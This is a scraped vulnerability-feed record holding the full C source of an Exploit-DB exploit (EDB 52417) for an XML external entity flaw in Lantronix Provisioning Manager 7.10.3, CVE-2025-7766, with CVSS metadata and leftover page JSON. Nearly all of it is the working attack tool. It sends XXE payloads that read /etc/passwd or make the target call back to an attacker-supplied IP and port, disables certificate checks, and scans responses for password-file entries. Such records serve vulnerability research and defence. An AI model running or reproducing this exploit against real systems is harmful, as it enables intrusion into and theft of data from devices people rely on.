{“lastseen”:”2025-08-18T18:05:35″,”description”:”\/ * Exploit Title: Lantronix Provisioning Manager 7.10.3 – XML External Entity Injection (XXE) …”,”published”:”2025-08-18T00:00:00″,”modified”:”2025-08-18T00:00:00″,”type”:”exploitdb”,”title”:”Lantronix Provisioning Manager 7.10.3 – XML External Entity Injection (XXE)”,”source”:””,”references”:””,”id”:”EDB-ID:52417″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-7766″],”sourceData”:”\/*\\r\\n * Exploit Title: Lantronix Provisioning Manager 7.10.3 – XML External Entity Injection (XXE)\\r\\n * Google Dork: N\/A\\r\\n * Date: 2025-08-17\\r\\n * Exploit Author: Byte Reaper\\r\\n * Vendor Homepage: https:\/\/www.lantronix.com\/\\r\\n * Software Link: https:\/\/www.lantronix.com\/products\/lantronix-provisioning-manager\/\\r\\n * Version: Provisioning Manager \u2264 7.10.3\\r\\n * Tested on: Kali Linux\\r\\n * CVE: CVE-2025-7766\\r\\n *\/\\r\\n\\r\\n\\r\\n#include\\u003cstdio.h\\u003e\\r\\n#include\\u003cstring.h\\u003e\\r\\n#include\\”argparse.h\\”\\r\\n#include\\u003ccurl\/curl.h\\u003e\\r\\n#include\\u003cstdlib.h\\u003e\\r\\n#include\\u003cunistd.h\\u003e\\r\\n#include \\u003carpa\/inet.h\\u003e\\r\\n#include \\u003csys\/socket.h\\u003e\\r\\n#define FULL_URL 3000\\r\\n#define SIZE_PAYLOAD 4000\\r\\nconst char *yourIp = NULL;\\r\\nconst char *url = NULL ;\\r\\nint yourPort = 0;\\r\\nint selecetCookie = 0;\\r\\nint verbose = 0;\\r\\nint loop = 0;\\r\\nint selectPayload = 0;\\r\\nconst char *yourPayload = NULL;\\r\\nchar full[FULL_URL];\\r\\nint requestPayload = 0;\\r\\nconst char *cookies = NULL;\\r\\n\\r\\nvoid exitSyscall()\\r\\n{\\r\\n __asm__ volatile\\r\\n (\\r\\n \\”xor %%rdi, %%rdi\\\\n\\\\t\\”\\r\\n \\”mov $0x3C, %%rax\\\\n\\\\t\\”\\r\\n \\”syscall\\\\n\\\\t\\”\\r\\n :\\r\\n :\\r\\n :\\”rax\\”, \\”rdi\\”\\r\\n );\\r\\n}\\r\\nstruct Mem\\r\\n{\\r\\n char *buffer;\\r\\n size_t len;\\r\\n};\\r\\nsize_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)\\r\\n{\\r\\n size_t total = size * nmemb;\\r\\n struct Mem *m = (struct Mem *)userdata;\\r\\n char *tmp = realloc(m-\\u003ebuffer, m-\\u003elen + total + 1);\\r\\n if (tmp == NULL)\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Failed to allocate memory!\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n m-\\u003ebuffer = tmp;\\r\\n memcpy(\\u0026(m-\\u003ebuffer[m-\\u003elen]), ptr, total);\\r\\n m-\\u003elen += total;\\r\\n m-\\u003ebuffer[m-\\u003elen] = ‘\\\\0’;\\r\\n return total;\\r\\n}\\r\\n\\r\\nvoid xmlPost(const char *fullUrl, const char *yourIp, int yourPort)\\r\\n{\\r\\n char payload[SIZE_PAYLOAD];\\r\\n struct Mem response =\\r\\n {\\r\\n NULL,\\r\\n 0\\r\\n };\\r\\n if (selectPayload)\\r\\n {\\r\\n int s = snprintf(payload,sizeof(payload),yourPayload);\\r\\n if (s \\u003c 0 || s \\u003e= sizeof(payload))\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Check len payload (yourPayload \\u003e= Size Payload) !\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n }\\r\\n if (requestPayload)\\r\\n {\\r\\n printf(\\”\\\\e[1;37m[+] Payload Select : Send Request Payload\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;34m[+] Please Check Server (python server, apache…)\\\\e[0m\\\\n\\”);\\r\\n\\r\\n const char *payloadR =\\r\\n \\”\\u003c?xml version=\\\\\\”1.0\\\\\\”?\\u003e\\\\n\\”\\r\\n \\”\\u003c!DOCTYPE doc [\\\\n\\”\\r\\n \\” \\u003c!ENTITY xxe SYSTEM \\\\\\”http:\/\/%s:%d\/xxe.test\\\\\\”\\u003e\\\\n\\”\\r\\n \\”]\\u003e\\\\n\\”\\r\\n \\”\\u003cconfig\\u003e\\\\n\\”\\r\\n \\” \\u003cdoc\\u003e\\u0026xxe;\\u003c\/doc\\u003e\\\\n\\”\\r\\n \\”\\u003c\/config\\u003e\\\\n\\”\\r\\n ;\\r\\n int r = snprintf(payload, sizeof(payload), payloadR, yourIp, yourPort);\\r\\n if (r \\u003c 0 || r \\u003e= sizeof(payload))\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Error building payloadR\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[1;37m[+] Payload Select : Read File : \/etc\/passwd !\\\\e[0m\\\\n\\”);\\r\\n const char *autoPayload =\\r\\n \\”\\u003c?xml version=\\\\\\”1.0\\\\\\”?\\u003e\\\\n\\”\\r\\n \\”\\u003c!DOCTYPE doc [\\\\n\\”\\r\\n \\” \\u003c!ENTITY xxe SYSTEM \\\\\\”file:\/\/\/etc\/passwd\\\\\\”\\u003e\\\\n\\”\\r\\n \\”]\\u003e\\\\n\\”\\r\\n \\”\\u003cconfig\\u003e\\\\n\\”\\r\\n \\” \\u003cdoc\\u003e\\u0026xxe;\\u003c\/doc\\u003e\\\\n\\”\\r\\n \\”\\u003c\/config\\u003e\\\\n\\”\\r\\n ;\\r\\n snprintf(payload,\\r\\n sizeof(payload),\\r\\n autoPayload);\\r\\n }\\r\\n\\r\\n\\r\\n CURL *curl = curl_easy_init();\\r\\n if (curl == NULL)\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Error Create Object Curl !\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n response.buffer = NULL;\\r\\n response.len = 0;\\r\\n\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[1;35m==========================================\\\\e[0m\\\\n\\”);\\r\\n printf(\\”[+] Cleaning Response…\\\\n\\”);\\r\\n printf(\\”[+] Response Buffer : %s\\\\n\\”, response.buffer);\\r\\n printf(\\”[+] Response Len : %zu\\\\n\\”, response.len);\\r\\n printf(\\”\\\\e[1;35m==========================================\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n CURLcode res;\\r\\n if (curl)\\r\\n {\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_URL,\\r\\n fullUrl);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_POSTFIELDS,\\r\\n payload);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_POSTFIELDSIZE,\\r\\n strlen(payload));\\r\\n\\r\\n if (selecetCookie)\\r\\n {\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEFILE,\\r\\n cookies);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_COOKIEJAR,\\r\\n cookies);\\r\\n\\r\\n }\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_FOLLOWLOCATION,\\r\\n 1L);\\r\\n sleep(1);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_WRITEFUNCTION,\\r\\n write_cb);\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[1;35m——————————————[Verbose Curl]——————————————\\\\e[0m\\\\n\\”);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_VERBOSE,\\r\\n 1L);\\r\\n }\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_WRITEDATA,\\r\\n \\u0026response);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_CONNECTTIMEOUT,\\r\\n 5L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_TIMEOUT,\\r\\n 10L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYPEER,\\r\\n 0L);\\r\\n curl_easy_setopt(curl,\\r\\n CURLOPT_SSL_VERIFYHOST,\\r\\n 0L);\\r\\n struct curl_slist *headers = NULL;\\r\\n headers = curl_slist_append(headers,\\r\\n \\”Accept-Language: en-US,en\\”);\\r\\n headers = curl_slist_append(headers,\\r\\n \\”Connection: keep-alive\\”);\\r\\n headers = curl_slist_append(headers,\\r\\n \\”Referer: http:\/\/example.com\\”);\\r\\n headers =curl_slist_append(headers,\\r\\n \\”Content-Type: application\/xml\\”);\\r\\n double totalTime;\\r\\n res = curl_easy_perform(curl);\\r\\n if (res == CURLE_OK)\\r\\n {\\r\\n curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, \\u0026totalTime);\\r\\n printf(\\”\\\\e[1;32m[+] Delayed response : %f\\\\n\\”, totalTime );\\r\\n printf(\\”\\\\e[1;36m[+] Request sent successfully\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;34m[+] Full URl : %s\\\\e[0m\\\\n\\”, full);\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[1;35m—————————[Payload Data]—————————\\\\e[0m\\\\n\\”);\\r\\n printf(\\”[+] Post data : %s\\\\n\\”, payload);\\r\\n printf(\\”\\\\e[1;35m—————————————————————–\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n long httpCode= 0 ;\\r\\n curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, \\u0026httpCode);\\r\\n if (httpCode \\u003e= 200 \\u0026\\u0026 httpCode \\u003c 300)\\r\\n {\\r\\n printf(\\”\\\\e[1;34m[+] Possible server vulnerability (CVE-2025-7766)!\\\\e[0m\\\\n\\”); printf(\\”\\\\e[1;34m[+] Please Check Reverse Shell Connection (port -\\u003e %d)\\\\e[0m\\\\n\\”, yourPort);\\r\\n printf(\\”[+] Http Code (200 \\u003c 300) !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;32m[+] Http Code : %ld\\\\e[0m\\\\n\\”, httpCode);\\r\\n printf(\\”\\\\e[1;35m====================================[Response]====================================\\\\e[0m\\\\n\\”);\\r\\n printf(\\”%s\\\\n\\”, response.buffer);\\r\\n printf(\\”\\\\e[1;32m[+] Response Len : %zu\\\\e[0m\\\\n\\”, response.len);\\r\\n printf(\\”\\\\e[1;35m===================================================================================\\\\e[0m\\\\n\\\\n\\”);\\r\\n const char *keywords[] =\\r\\n {\\r\\n \\”root:x:0:0\\”,\\r\\n \\”:\/bin\/bash\\”,\\r\\n \\”:\/home\/\\”,\\r\\n \\”daemon:x:\\”,\\r\\n \\”nobody:x:\\”,\\r\\n \\”:x:1000:\\”,\\r\\n \\”\/usr\/sbin\/nologin\\”,\\r\\n \\”sys:x:\\”,\\r\\n \\”bin:x:\\”,\\r\\n \\”mail:x:\\”\\r\\n };\\r\\n printf(\\”\\\\e[1;34m[+] Check keyword On Response…\\\\e[0m\\\\n\\”);\\r\\n int numberKeyword = sizeof(keywords) \/ sizeof(keywords[0]);\\r\\n int found = 0;\\r\\n for (int f = 0; f \\u003c numberKeyword; f++)\\r\\n {\\r\\n if (strstr(response.buffer,keywords[f]) != NULL)\\r\\n {\\r\\n printf(\\”\\\\e[1;33m[+] Keyword Found In response : %s\\\\e[0m\\\\n\\”, keywords[f]);\\r\\n found = 1;\\r\\n }\\r\\n else\\r\\n {\\r\\n found = 0;\\r\\n }\\r\\n }\\r\\n if (found)\\r\\n {\\r\\n printf(\\”\\\\e[1;36m[+] The server suffers from a vulnerability CVE-2025-7766.\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Not Found Keyword In Response !\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Http Code : %ld\\\\e[0m\\\\n\\”, httpCode);\\r\\n printf(\\”\\\\e[1;31m[-] Please Check Url (%s)!\\\\e[0m\\\\n\\”, fullUrl);\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[1;35m====================================[Response]====================================\\\\n\\”);\\r\\n printf(\\”%s\\\\n\\”, response.buffer);\\r\\n printf(\\”\\\\e[1;32m[+] Response Len : %zu\\\\e[0m\\\\n\\”, response.len);\\r\\n printf(\\”\\\\e[1;35m===================================================================================\\\\n\\\\n\\”);\\r\\n }\\r\\n }\\r\\n curl_slist_free_all(headers);\\r\\n curl_easy_cleanup(curl);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] The request was not sent !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;31m[-] Error : %s\\\\e[0m\\\\n\\”, curl_easy_strerror(res));\\r\\n if (verbose)\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Exit Syscall …\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n curl_slist_free_all(headers);\\r\\n curl_easy_cleanup(curl);\\r\\n exitSyscall();\\r\\n }\\r\\n }\\r\\n if (response.buffer)\\r\\n {\\r\\n free(response.buffer);\\r\\n response.buffer = NULL;\\r\\n response.len = 0;\\r\\n }\\r\\n curl_easy_cleanup(curl);\\r\\n}\\r\\n\\r\\nint main(int argc,\\r\\n const char **argv)\\r\\n{\\r\\n printf\\r\\n (\\r\\n \\”\\\\e[1;91m\\”\\r\\n \\”\u2584\u2596\u2596\u2596\u2584\u2596 \u2584\u2596\u2584\u2596\u2584\u2596\u2584\u2596 \u2584\u2596\u2584\u2596\u2584\u2596\u2584\u2596\\\\n\\”\\r\\n \\”\u258c \u258c\u258c\u2599\u2596\u2584\u2596\u2584\u258c\u259b\u258c\u2584\u258c\u2599\u2596\u2584\u2596 \u258c \u258c\u2599\u2596\u2599\u2596\\\\n\\”\\r\\n \\”\u2599\u2596\u259a\u2598\u2599\u2596 \u2599\u2596\u2588\u258c\u2599\u2596\u2584\u258c \u258c \u258c\u2599\u258c\u2599\u258c\\\\n\\”\\r\\n \\”\\\\e[1;97m\\\\t Byte Reaper\\\\e[0m\\\\n\\”\\r\\n );\\r\\n printf(\\”\\\\e[1;91m—————————————————————————————\\\\e[0m\\\\n\\”);\\r\\n struct argparse_option options[] =\\r\\n {\\r\\n OPT_HELP(),\\r\\n OPT_STRING(‘u’,\\r\\n \\”url\\”,\\r\\n \\u0026url,\\r\\n \\”Target Url (full url)\\”),\\r\\n OPT_STRING(‘c’,\\r\\n \\”cookies\\”,\\r\\n \\u0026cookies,\\r\\n \\”cookies File\\”),\\r\\n OPT_BOOLEAN(‘v’,\\r\\n \\”verbose\\”,\\r\\n \\u0026verbose,\\r\\n \\”Verbose Mode\\”),\\r\\n OPT_STRING(‘i’,\\r\\n \\”ip\\”,\\r\\n \\u0026yourIp,\\r\\n \\”Enter Your IP (Send Requst, Localhost ip…)\\”),\\r\\n OPT_INTEGER(‘p’,\\r\\n \\”port\\”,\\r\\n \\u0026yourPort,\\r\\n \\”Enter Number Port (Http Request,Check Vuln…)\\”),\\r\\n OPT_INTEGER(‘l’,\\r\\n \\”loop\\”,\\r\\n \\u0026loop,\\r\\n \\”Number of times you send requests\\”),\\r\\n OPT_STRING(‘b’,\\r\\n \\”payload\\”,\\r\\n \\u0026yourPayload,\\r\\n \\”Enter Your Payload\\”),\\r\\n OPT_BOOLEAN(‘r’,\\r\\n \\”request\\”,\\r\\n \\u0026requestPayload,\\r\\n \\”Payload Send Request in Your Server \\”),\\r\\n\\r\\n\\r\\n\\r\\n OPT_END(),\\r\\n };\\r\\n struct argparse argparse;\\r\\n argparse_init(\\u0026argparse,\\r\\n options,\\r\\n NULL,\\r\\n 0);\\r\\n\\r\\n argparse_parse(\\u0026argparse,\\r\\n argc,\\r\\n argv);\\r\\n if (!url ||\\r\\n !yourIp ||\\r\\n yourPort == 0)\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Please Enter Target Url ,Your ip, port!\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;31m[-] Ex : .\/exploit -u https:\/\/ip:port\/path -i IP -p PORT\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;31m[-] Exit syscall…\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n strncpy(full, url, FULL_URL – 1);\\r\\n full[FULL_URL – 1] = ‘\\\\0’;\\r\\n in_addr_t value = inet_addr(yourIp);\\r\\n if (value == INADDR_NONE)\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Invalid Ip String !\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n if (yourPort \\u003c 1 || yourPort \\u003e 65535)\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Invalid Port, Exit…\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n if (strncmp(full, \\”http:\/\/\\”, 7) != 0 \\u0026\\u0026\\r\\n strncmp(full, \\”https:\/\/\\”, 8) != 0)\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Invalid URL! Must start with http:\/\/ or https:\/\/\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n\\r\\n if (verbose)\\r\\n {\\r\\n\\r\\n verbose = 1;\\r\\n }\\r\\n if (cookies)\\r\\n {\\r\\n selecetCookie = 1;\\r\\n }\\r\\n\\r\\n if (requestPayload)\\r\\n {\\r\\n requestPayload = 1;\\r\\n }\\r\\n if (loop)\\r\\n {\\r\\n printf(\\”\\\\e[1;36m[+] Argument –loop Run …\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;36m[+] Number Loop : %d\\\\e[0m\\\\n\\”, loop);\\r\\n printf(\\”——————————————————\\\\n\\”);\\r\\n for (int o = 0; o \\u003c loop ; o++)\\r\\n {\\r\\n printf(\\”[%d]: \\\\n\\”, o);\\r\\n xmlPost(full, yourIp,yourPort);\\r\\n printf(\\”——————————————————\\\\n\\”);\\r\\n }\\r\\n }\\r\\n if (yourPayload)\\r\\n {\\r\\n selectPayload = 1;\\r\\n }\\r\\n else\\r\\n {\\r\\n xmlPost(full, yourIp,yourPort);\\r\\n }\\r\\n return 0;\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52417″,”cvss”:{“score”:8.6,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:A\/AC:L\/AT:N\/PR:N\/UI:P\/VC:H\/SC:L\/VI:H\/SI:L\/VA:H\/SA:L”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52417″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-18T18:05:35″,”description”:”\/ * Exploit Title: Lantronix Provisioning Manager 7.10.3 – XML External Entity Injection (XXE) …”,”published”:”2025-08-18T00:00:00″,”modified”:”2025-08-18T00:00:00″,”type”:”exploitdb”,”title”:”Lantronix Provisioning Manager 7.10.3 – XML External Entity Injection (XXE)”,”source”:””,”references”:””,”id”:”EDB-ID:52417″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-7766″],”sourceData”:”\/*\\r\\n *…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,81,12,40,15,13,7,11,5],"class_list":["post-13325","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-86","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n